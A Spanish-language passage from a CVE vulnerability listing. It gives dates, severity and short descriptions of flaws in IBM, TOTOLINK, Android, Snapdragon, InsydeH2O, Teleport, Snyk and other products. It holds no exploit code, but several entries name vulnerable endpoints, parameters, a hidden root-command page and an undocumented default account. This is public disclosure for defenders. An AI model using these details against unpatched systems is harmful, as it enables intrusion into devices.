    IBM Control Desk versión 7.6.1, podría permitir a un atacante remoto obtener información confidencial, causada por el fallo en la configuración del flag HTTPOnly. Un atacante remoto podría aprovechar esta vulnerabilidad para obtener información confidencial de la cookie. IBM X-Force ID: 219126
  • CVE-2022-22483
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    IBM Db2 para Linux, UNIX y Windows versiones 9.7, 10.1, 10.5, 11.1 y 11.5, es vulnerable a una divulgación de información en algunos escenarios debido a un acceso no autorizado causado por una administración de privilegios inapropiada cuando es usado el comando CREATE OR REPLACE. IBM X-Force ID: 225979
  • CVE-2022-36768
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    IBM AIX versiones 7.1, 7.2, 7.3 y VIOS versión 3.1, podrían permitir a un usuario local no privilegiado aprovechar una vulnerabilidad en el comando invscout para obtener privilegios de root. IBM X-Force ID: 232014
  • CVE-2022-36436
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/09/2022
    Fecha de última actualización: 08/08/2023
    OSU Open Source Lab VNCAuthProxy versiones hasta 1.1.1, está afectado por una vulnerabilidad de omisión de autenticación en el archivo vncap/vnc/protocol.py VNCServerAuthenticator que podría permitir a un actor malicioso conseguir acceso no autorizado a una sesión VNC o desconectar a un usuario legítimo de una sesión VNC. Un atacante remoto con acceso a la red del servidor proxy podría aprovechar esta vulnerabilidad para conectarse a servidores VNC protegidos por el servidor proxy sin proporcionar ninguna credencial de autenticación. Una explotación de este problema requiere que el servidor proxy esté aceptando conexiones para el servidor VNC objetivo
  • CVE-2022-38007
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Azure Guest Configuration and Azure Arc-enabled servers
  • CVE-2022-20385
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    una función llamada "nla_parse", no comprueba el len de para, comprobará nla_type (que puede ser controlado por el espacio de usuario) con "maxtype" (en este caso, es GSCAN_MAX), entonces accede a la matriz de políticas "policy[type]", que el acceso OOB sucede. Producto: Android, Versiones: Android SoC, ID de Android: A-238379819
  • CVE-2022-20393
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    En la función extract3GPPGlobalDescriptions del archivo TextDescriptions.cpp, se presenta una posible lectura fuera de límites debido a un desbordamiento de enteros. Esto podría conllevar a una divulgación de información local desde el servidor de medios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-11 Android-12 Android-12L, ID de Android: A-233735886
  • CVE-2022-20396
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    En el archivo SettingsActivity.java, se presenta una posible forma de hacer que un dispositivo sea detectable a través de Bluetooth, sin permiso o interacción del usuario, debido a una omisión de permisos. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12L Android-13, ID de Android: A-234440688
  • CVE-2022-38308
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLink A700RU versión V7.4cu.2313_B20191024, contiene una vulnerabilidad de inyección de comandos por medio del parámetro lang en la función cstesystem. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una carga útil diseñada
  • CVE-2022-37190
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    CuppaCMS versión 1.0, es vulnerable a una ejecución de código remota (RCE). Un usuario autenticado puede controlar ambos parámetros (acción y función) desde el archivo "/api/index.php
  • CVE-2022-38768
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    La aplicación móvil en Transtek Mojodat FAM (Fixed Asset Management) versión 2.4.6, permite a atacantes remotos omitir la autorización
  • CVE-2022-38769
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    La aplicación móvil en Transtek Mojodat FAM (Fixed Asset Management) versión 2.4.6 permite a atacantes remotos obtener contraseñas en texto sin cifrar tras una petición de inicio de sesión con éxito
  • CVE-2022-38770
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    La aplicación móvil en Transtek Mojodat FAM (Fixed Asset Management) versión 2.4.6, permite a atacantes remotos obtener los datos de otros usuarios tras una petición de inicio de sesión con éxito
  • CVE-2021-38924
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/09/2022
    Fecha de última actualización: 08/08/2023
    IBM Maximo Asset Management versiones 7.6.1.1 y 7.6.1.2, podría permitir a un atacante remoto obtener información confidencial cuando es devuelto un mensaje de error técnico detallado en el navegador. Esta información podría usarse en otros ataques contra el sistema. IBM X-Force ID: 210163
  • CVE-2022-38828
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/09/2022
    Fecha de última actualización: 08/08/2023
    TOTOLINK T6 V4.1.5cu.709_B20210518 es vulnerable a la inyección de comandos a través de cstecgi.cgi
  • CVE-2022-38826
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/09/2022
    Fecha de última actualización: 08/08/2023
    En TOTOLINK T6 V4.1.5cu.709_B20210518, se presenta un comando de ejecución arbitraria en cstecgi.cgi
  • CVE-2021-42949
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/09/2022
    Fecha de última actualización: 08/08/2023
    La función controlla_login del componente HotelDruid Hotel Management Software versión v3.0.3, genera un token de sesión predecible, permitiendo a atacantes omitir la autenticación por medio de ataques de fuerza bruta
  • CVE-2022-38845
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de tipo Cross Site Scripting en la funcionalidad Import de EspoCRM versión 7.1.8, permite a usuarios remotos ejecutar JavaScript malicioso en el navegador de la víctima por medio del envío de un archivo csv diseñado que contiene JavaScript malicioso al usuario autenticado. Cualquier usuario autenticado que importe el archivo CSV diseñado puede terminar ejecutando el JavaScript malicioso en el navegador
  • CVE-2022-36536
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/09/2022
    Fecha de última actualización: 08/08/2023
    Un problema en el componente post_applogin.php de Super Flexible Software GmbH & Co. KG Syncovery 9 para Linux versiones v9.47x y anteriores, permite a atacantes escalar privilegios por medio de la creación de tokens de sesión diseñados
  • CVE-2022-38307
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que LIEF commit 5d1d643, contiene una violación de segmentación por medio de la función LIEF::MachO::SegmentCommand::file_offset() en el archivo /MachO/SegmentCommand.cpp
  • CVE-2022-40736
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Bento4 versión 1.6.0-639. Había un consumo excesivo de memoria en la función AP4_CttsAtom::Create en el archivo Core/Ap4CttsAtom.cpp
  • CVE-2022-37262
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha encontrado un fallo de Denegación de Servicio por Expresión Regular (ReDoS) en stealjs steal versión 2.2.4, por medio de la variable source y sourceWithComments en el archivo main.js
  • CVE-2021-23382
    Severidad: MEDIA
    Fecha de publicación: 26/04/2021
    Fecha de última actualización: 08/08/2023
    El paquete postcss versiones anteriores a 8.2.13, es vulnerable a una Denegación de Servicio de Expresión Regular (ReDoS) por medio de las funciones getAnnotationURL() y loadAnnotation() en la biblioteca lib/previous-map.js. Las expresiones regulares vulnerables son causadas principalmente por el subpatrón \/\*\s* sourceMappingURL=(.*)
  • CVE-2022-37260
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha encontrado un fallo de Denegación de Servicio por Expresión Regular (ReDoS) en stealjs 2.2.4 por medio de la variable input en el archivo main.js
  • CVE-2022-35582
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Penta Security Systems Inc WAPPLES versiones 4.0.*, 5.0.0.*, 5.0.12.* son vulnerables a un Control de Acceso Incorrecto. El sistema operativo en el que es ejecutado WAPPLES presenta incorporado un usuario no privilegiado penta con una contraseña predefinida. La contraseña de este usuario, así como su existencia, no es divulgada en la documentación. Conociendo las credenciales, los atacantes pueden usar esta característica para conseguir un acceso no controlado al dispositivo, por lo que es considerada una posibilidad no documentada de control remoto
  • CVE-2022-40306
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/09/2022
    Fecha de última actualización: 08/08/2023
    El formulario de inicio de sesión /Login en ECi Printanista Hub (anteriormente FMAudit Printscout) versiones hasta 27-06-2022, lleva a cabo costosas operaciones de generación de claves RSA, lo que permite a atacantes causar una denegación de servicio (DoS) al solicitar dicho formulario repetidamente
  • CVE-2021-23133
    Severidad: MEDIA
    Fecha de publicación: 22/04/2021
    Fecha de última actualización: 28/07/2023
    Una condición de carrera en los sockets SCTP del kernel de Linux (el archivo net/sctp/socket.c) versiones anteriores a 5.12-rc8, puede conllevar a una escalada de privilegios del kernel desde el contexto de un servicio de red o un proceso no privilegiado. Si la función sctp_destroy_sock es llamado sin sock_net (sk) -) sctp.addr_wq_lock, un elemento es eliminado de la lista auto_asconf_splist sin ningún bloqueo apropiado. Esto puede ser explotado por un atacante con privilegios de servicio de red para escalar a root o desde el contexto de un usuario no privilegiado directamente si un BPF_CGROUP_INET_SOCK_CREATE es adjuntado que niega la creación de algún socket SCTP
  • Vulnerabilidad en el envío de tráfico SIP en el motor de inspección SIP del Software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD) (CVE-2021-1501)
    Severidad: ALTA
    Fecha de publicación: 29/04/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el motor de inspección SIP del Software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD), podría permitir a un atacante remoto no autenticado causar un bloqueo y la recarga de un dispositivo afectado, resultando en una denegación de servicio ( DoS). La vulnerabilidad es debido a un bloqueo que ocurre durante una búsqueda de hash para una conexión SIP pinhole. Un atacante podría explotar esta vulnerabilidad mediante el envío de tráfico SIP diseñado a través de un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar un bloqueo y recargar el dispositivo afectado
  • CVE-2022-38535
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK-720R versión v4.1.5cu.374, contiene una vulnerabilidad de ejecución de código remota (RCE) por medio de la función setTracerouteCfg
  • CVE-2022-38534
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK-720R versión v4.1.5cu.374, contiene una vulnerabilidad de ejecución de código remota (RCE) por medio de la función setdiagnosicfg
  • CVE-2022-22074
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/09/2022
    Fecha de última actualización: 08/08/2023
    Una corrupción de memoria durante la reproducción de archivos wma debido a un desbordamiento de enteros en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables
  • CVE-2022-22081
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/09/2022
    Fecha de última actualización: 08/08/2023
    Una corrupción de memoria en el módulo de audio debido a un desbordamiento de enteros en Snapdragon Auto, Snapdragon Connectivity, Snapdragon Mobile, Snapdragon Wearables
  • CVE-2022-22091
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/09/2022
    Fecha de última actualización: 08/08/2023
    Una autorización inapropiada de un comando de modo de seguridad LTE reproducido puede conllevar a una denegación de servicio en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables
  • CVE-2022-25654
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/09/2022
    Fecha de última actualización: 08/08/2023
    Corrupción de memoria en el kernel debido a una comprobación de entrada incorrecta mientras son procesados comandos ION en Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Wearables
  • CVE-2022-39007
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/09/2022
    Fecha de última actualización: 08/08/2023
    El módulo de localización presenta una vulnerabilidad de omitir una verificación de permisos. Una explotación con éxito de esta vulnerabilidad puede causar una escalada de privilegios
  • CVE-2022-29908
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/09/2022
    Fecha de última actualización: 08/08/2023
    El servicio folioupdate en Fabasoft Cloud Enterprise Client 22.4.0043 permite una Escalada de Privilegios Local
  • CVE-2022-40141
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en Trend Micro Apex One y Apex One as a Service podría permitir a un atacante interceptar y decodificar determinadas cadenas de comunicación que pueden contener algunos atributos de identificación de un servidor Apex One en particular
  • CVE-2022-40139
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/09/2022
    Fecha de última actualización: 08/08/2023
    Una comprobación inapropiada de algunos componentes usados por el mecanismo de reversión en los clientes de Trend Micro Apex One y Trend Micro Apex One as a Service podría permitir a un administrador del servidor Apex One indicar a clientes afectados descargar un paquete de reversión no verificado, lo que podría conllevar a una ejecución de código remota. Nota: un atacante debe obtener primero el acceso a la consola de administración del servidor Apex One para poder explotar esta vulnerabilidad
  • CVE-2022-39974
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que WASM3 versión v0.5.0, contiene un fallo de segmentación por medio del componente op_Select_i32_srs en el archivo wasm3/source/m3_exec.h
  • CVE-2022-40761
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/09/2022
    Fecha de última actualización: 08/08/2023
    La función tee_obj_free en Samsung mTower versiones hasta 0.3.0, permite que una aplicación confiable desencadene una denegación de servicio (DoS) al invocar la función TEE_AllocateOperation con una disposición de la pila alterada, relacionada con utee_cryp_obj_alloc
  • CVE-2022-38497
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que LIEF commit 365a16a, contiene una violación de segmentación por medio del componente CoreFile.tcc:69
  • CVE-2022-35086
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que SWFTools commit 772e55a2, contiene una violación de segmentación por medio del archivo /multiarch/memmove-vec-unaligned-erms.S
  • CVE-2022-35087
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que SWFTools commit 772e55a2, contiene una violación de segmentación por medio de MovieAddFrame en el archivo /src/gif2swf.c
  • CVE-2022-37259
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha encontrado un fallo de Denegación de Servicio por Expresión Regular (ReDoS) en stealjs steal versión 2.2.4, por medio de la variable string en el archivo babel.js
  • CVE-2022-28321
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/09/2022
    Fecha de última actualización: 08/08/2023
    El paquete Linux-PAM versiones anteriores a 1.5.2-6.1 para openSUSE Tumbleweed, permite omitir la autenticación en los inicios de sesión SSH. El módulo pam_access.so no restringe correctamente el inicio de sesión si un usuario intenta conectarse desde una dirección IP que no es resoluble por medio de DNS. En tales condiciones, un usuario con acceso denegado a una máquina puede seguir accediendo. NOTA: la relevancia de este problema es limitada en gran medida a openSUSE Tumbleweed y openSUSE Factory; no afecta a Linux-PAM upstream
  • CVE-2021-33079
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/09/2022
    Fecha de última actualización: 08/08/2023
    Un fallo del mecanismo de protección en el firmware de algunos productos Intel(R) SSD DC puede permitir a un usuario privilegiado potencialmente habilitar una divulgación de información por medio del acceso local
  • CVE-2022-37027
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/09/2022
    Fecha de última actualización: 08/08/2023
    Ahsay AhsayCBS versión 9.1.4.0, permite a un usuario autenticado del sistema inyectar opciones arbitrarias de Java JVM. Los administradores que pueden modificar las opciones de tiempo de ejecución en la interfaz web pueden inyectar opciones de tiempo de ejecución de Java. Estas presentan efecto después de un reinicio. Por ejemplo, un atacante puede habilitar los servicios JMX y, en consecuencia, lograr ]una ejecución de código remota como usuario del sistema
  • CVE-2021-33081
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/09/2022
    Fecha de última actualización: 08/08/2023
    Un fallo en el mecanismo de protección del firmware de algunos productos Intel(R) SSD DC puede permitir a un usuario privilegiado la divulgación de información por medio de un acceso local
  • CVE-2022-40616
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/09/2022
    Fecha de última actualización: 08/08/2023
    IBM Maximo Asset Management versiones 7.6.1.1, 7.6.1.2 y 7.6.1.3, podrían permitir a un usuario omitir la autenticación y obtener información confidencial o llevar a cabo tareas a las que no debería tener acceso. IBM X-Force ID: 236311
  • CVE-2021-28500
    Severidad: MEDIA
    Fecha de publicación: 14/01/2022
    Fecha de última actualización: 17/08/2023
    Se ha detectado recientemente un problema en Arista EOS donde el uso incorrecto de las API AAA de EOS por parte de los agentes OpenConfig y TerminAttr podría resultar en un acceso no restringido al dispositivo para usuarios locales con una configuración sin contraseña
  • CVE-2021-42067
    Severidad: MEDIA
    Fecha de publicación: 14/01/2022
    Fecha de última actualización: 08/08/2023
    En SAP NetWeaver AS for ABAP y ABAP Platform - versiones 701, 702, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, 786, un atacante autenticado como usuario normal puede usar el cuadro de mandos de S/4 Hana para revelar sistemas y servicios que normalmente no se le permitiría ver. No es posible la alteración de la información ni la denegación de servicio
  • CVE-2022-37026
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/09/2022
    Fecha de última actualización: 08/08/2023
    En Erlang/OTP versiones anteriores a 23.3.4.15, 24.x anteriores a 24.3.4.2 y 25.x anteriores a 25.0.2, se presenta una Omisión de Autenticación de Cliente en determinadas situaciones de certificación de cliente para SSL, TLS y DTLS
  • CVE-2022-40298
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/09/2022
    Fecha de última actualización: 08/08/2023
    Crestron AirMedia para Windows versiones anteriores a 5.5.1.84, presenta permisos heredados no seguros, lo que conlleva a una vulnerabilidad de escalada de privilegios encontrada en la aplicación AirMedia Windows, versión 4.3.1.39. Un usuario poco privilegiado puede iniciar una reparación del sistema y conseguir un shell de nivel SYSTEM.
  • CVE-2022-38512
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/09/2022
    Fecha de última actualización: 08/08/2023
    El módulo de traducción de Liferay Portal versiones v7.4.3.12 hasta v7.4.3.36, y Liferay DXP versiones 7.4 update 8 hasta 36, no comprueba los permisos antes de permitir a un usuario exportar un contenido web para su traducción, permitiendo a atacantes descargar el archivo de traducción XLIFF de una página de contenido web por medio de una URL diseñada
  • CVE-2022-35896
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de pérdida de memoria en el controlador SMM (SMRAM) en InsydeH2O con el kernel versiones 5.0 hasta 5.5. Un atacante puede volcar el contenido de la SMRAM por medio del software SMI proporcionado por el controlador FvbServicesRuntimeDxe para leer el contenido de la SMRAM, conllevando a una divulgación de información
  • CVE-2022-23144
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/09/2022
    Fecha de última actualización: 08/08/2023
    Existe una vulnerabilidad de control de acceso rota en el producto ZTE ZXvSTB. Debido a un control de permisos inadecuado, los atacantes podrían utilizar esta vulnerabilidad para eliminar el tipo de aplicación por defecto, lo que afecta al uso normal del sistema
  • CVE-2022-26707
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/09/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema en el manejo de las variables de entorno con una comprobación mejorada. Este problema ha sido corregido en macOS Monterey versión 12.4. Es posible que un usuario pueda visualizar información confidencial del usuario.
  • CVE-2021-41437
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Un ataque de división de la respuesta HTTP en la aplicación web en ASUS RT-AX88U versiones anteriores a v3.0.0.4.388.20558, permite a un atacante diseñar una URL específica que si una víctima autenticada la visita, la URL dará acceso al almacenamiento en la nube del atacante.
  • CVE-2022-32796
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/09/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de corrupción de memoria con una administración de estados mejorada. Este problema ha sido corregido en macOS Monterey versión 12.5. Una aplicación puede ser capaz de ejecutar código arbitrario con privilegios del kernel.
  • CVE-2022-22610
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/09/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de corrupción de memoria con una administración de estados mejorada. Este problema ha sido corregido en macOS Monterey versión 12.3, Safari versión 15.4, watchOS versión 8.5, iOS versión 15.4 y iPadOS versión 15.4, tvOS versión 15.4. El procesamiento de contenido web diseñado de forma maliciosa puede conllevar a una ejecución de código.
  • CVE-2022-40785
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Una entrada no saneada cuando es configurado un archivo de configuración regional conlleva a una inyección de shell en mIPC camera firmware versión 5.3.1.2003161406. Esto permite a un atacante obtener una ejecución de código remota en las cámaras que ejecutan el firmware cuando una víctima inicia sesión en una aplicación móvil especialmente diseñada.
  • CVE-2022-35893
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Insyde InsydeH2O con el kernel versiones 5.0 hasta 5.5. Una vulnerabilidad de corrupción de memoria SMM en el controlador FvbServicesRuntimeDxe permite a un atacante escribir datos fijos o predecibles en la SMRAM. Una explotación de este problema podría conllevar a una escalada de privilegios en SMM.
  • CVE-2022-36771
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/09/2022
    Fecha de última actualización: 08/08/2023
    IBM QRadar User Behavior Analytics podría permitir a un usuario autenticado obtener información confidencial a la que no debería tener acceso. IBM X-Force ID: 232791
  • CVE-2022-3236
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de inyección de código en User Portal and Webadmin permite a un atacante remoto ejecutar código en Sophos Firewall versiones v19.0 MR1 y anteriores.
  • CVE-2022-40816
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/09/2022
    Fecha de última actualización: 08/08/2023
    Zammad versión 5.2.1, es vulnerable a un Control de Acceso Incorrecto. El mecanismo de manejo de activos de Zammad presenta una lógica para asegurar que los usuarios clientes no puedan visualizar la información personal de otros usuarios. Esta lógica no era efectiva cuando era usada mediante una conexión de socket web, por lo que un atacante que hubiera iniciado sesión podríaconseguir datos personales de otros usuarios consultando la API de Zammad. Este problema ha sido corregido en versión 5.2.2
  • CVE-2022-38170
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/09/2022
    Fecha de última actualización: 08/08/2023
    En Apache Airflow versiones anteriores a 2.3.4, era configurado una máscara de usuario no segura para numerosos componentes de Airflow cuando es ejecutado con el flag "--daemon", lo que podía resultar en una condición de carrera que daba lugar a archivos de escritura mundial en el directorio principal de Airflow y permitía a usuarios locales exponer contenidos de archivos arbitrarios por medio del servidor web
  • CVE-2022-40929
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/09/2022
    Fecha de última actualización: 08/08/2023
    XXL-JOB versión 2.2.0, presenta una vulnerabilidad de ejecución de Comandos en tareas de fondo
  • CVE-2022-36448
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en InsydeH2O con el kernel versiones 5.0 hasta 5.5. Se presenta una vulnerabilidad de corrupción de memoria SMM en el manejador SMI de software en el controlador PnpSmm
  • CVE-2022-35513
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/09/2022
    Fecha de última actualización: 08/08/2023
    La aplicación Blink1Control2 versiones anteriores a 2.2.7 incluyéndola, usa un cifrado de contraseña débil y un método de almacenamiento no seguro
  • CVE-2022-29850
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Varios productos de Lexmark hasta el 2022-04-27 permiten a un atacante que ya ha comprometido un dispositivo Lexmark afectado mantener la persistencia a través de los reinicios
  • CVE-2022-36633
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/08/2022
    Fecha de última actualización: 08/08/2023
    Teleport versión 9.3.6 es vulnerable a una inyección de comandos conllevando a una ejecución de código remota. Un atacante puede diseñar un enlace malicioso de instalación del agente ssh mediante la codificación de la URL de un escape bash con retorno de línea. Esta carga útil codificada en la URL puede usarse en lugar de un token y enviarse a un usuario en un ataque de ingeniería social. Este es un ataque totalmente no autenticado que usa el servidor de teleportación confiable para entregar la carga útil.
  • CVE-2022-36158
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
    Contec FXA3200 versiones 1.13.00 y anteriores, sufre de permisos no seguros en la interfaz del Wireless LAN Manager, lo que permite a actores maliciosos ejecutar comandos de Linux con privilegios de root por medio de una página web oculta (/usr/www/ja/mnt_cmd.cgi).
  • CVE-2022-40475
    Severidad: Pendiente de análisis
    Fecha de publicación: 29/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que TOTOLINK A860R versión V4.1.2cu.5182_B20201027, contiene una inyección de comandos por medio del componente /cgi-bin/downloadFile.cgi
  • CVE-2022-41975
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/09/2022
    Fecha de última actualización: 08/08/2023
    vRealVNC VNC Server versiones anteriores a 6.11.0 y VNC Viewer versiones anteriores a 6.22.826 en Windows, permiten una escalada de privilegios local por medio del modo de reparación del instalador MSI
  • CVE-2022-2778
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/09/2022
    Fecha de última actualización: 08/08/2023
    En las versiones afectadas de Octopus Deploy es posible omitir la limitación de velocidad en el inicio de sesión usando bytes nulos
  • CVE-2022-23331
    Severidad: MEDIA
    Fecha de publicación: 08/02/2022
    Fecha de última actualización: 08/08/2023
    En DataEase versión v1.6.1, un usuario autenticado puede conseguir acceso no autorizado a toda la información del usuario y puede cambiar la contraseña del administrador
  • CVE-2022-38817
    Severidad: Pendiente de análisis
    Fecha de publicación: 03/10/2022
    Fecha de última actualización: 08/08/2023
    Dapr Dashboard versiones v0.1.0 hasta v0.10.0, es vulnerable a un Control de Acceso Incorrecto que permite a atacantes obtener datos confidenciales
  • CVE-2022-40764
    Severidad: Pendiente de análisis
    Fecha de publicación: 03/10/2022
    Fecha de última actualización: 08/08/2023
    Snyk CLI versiones anteriores a 1.996.0, permite una ejecución de comandos arbitraria, afectando a los plugins de Snyk IDE y al paquete snyk npm. La explotación podría seguir la práctica común de ver archivos no confiables en el editor de código de Visual Studio, por ejemplo. La demostración original fue con metacaracteres de shell en el campo vendor.json ignore, afectando a snyk-go-plugin versiones anteriores a 1.19.1. Esto afecta, por ejemplo, al plugin Snyk TeamCity (que no se actualiza automáticamente) versiones anteriores a 20220930.142957
  • CVE-2022-25857
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/08/2022
    Fecha de última actualización: 08/08/2023
    El paquete org.yaml:snakeyaml versiones desde 0 y anteriores a 1.31, son vulnerables a una Denegación de Servicio (DoS) debido a una falta de limitación de profundidad anidada para las colecciones
  • CVE-2022-20625
    Severidad: MEDIA
    Fecha de publicación: 23/02/2022
    Fecha de última actualización: 24/07/2023
    Una vulnerabilidad en el servicio Cisco Discovery Protocol del software Cisco FXOS y del software Cisco NX-OS podría permitir a un atacante adyacente no autenticado hacer que el servicio se reinicie, lo que provocaría una condición de denegación de servicio (DoS). Esta vulnerabilidad se debe al manejo inadecuado de los mensajes del Cisco Discovery Protocol que son procesados por el servicio Cisco Discovery Protocol. Un atacante podría explotar esta vulnerabilidad enviando una serie de mensajes maliciosos de Cisco Discovery Protocol a un dispositivo afectado. Una explotación exitosa podría permitir al atacante hacer que el servicio Cisco Discovery Protocol falle y se reinicie. En raras condiciones, podrían producirse fallos repetidos del proceso, lo que podría provocar el reinicio de todo el dispositivo
  • CVE-2022-30613
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/10/2022
    Fecha de última actualización: 08/08/2023
    IBM QRadar SIEM versiones 7.4 y 7.5, podría divulgar información confidencial por medio de un servicio local a un usuario privilegiado. IBM X-Force ID: 227366
  • CVE-2022-22480
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/10/2022
    Fecha de última actualización: 08/08/2023
    Un reequilibrio de nodos de datos de IBM QRadar SIEM versiones 7.4 y 7.5, no funciona correctamente cuando son usados hosts cifrados, lo que podría resultar en una divulgación de información. IBM X-Force ID: 225889
  • CVE-2022-36772
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/10/2022
    Fecha de última actualización: 08/08/2023
    IBM InfoSphere Information Server versión 11.7, podría permitir a un usuario autenticado obtener información confidencial que sólo debería estar disponible para un usuario privilegiado
  • CVE-2022-26475
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/10/2022
    Fecha de última actualización: 08/08/2023
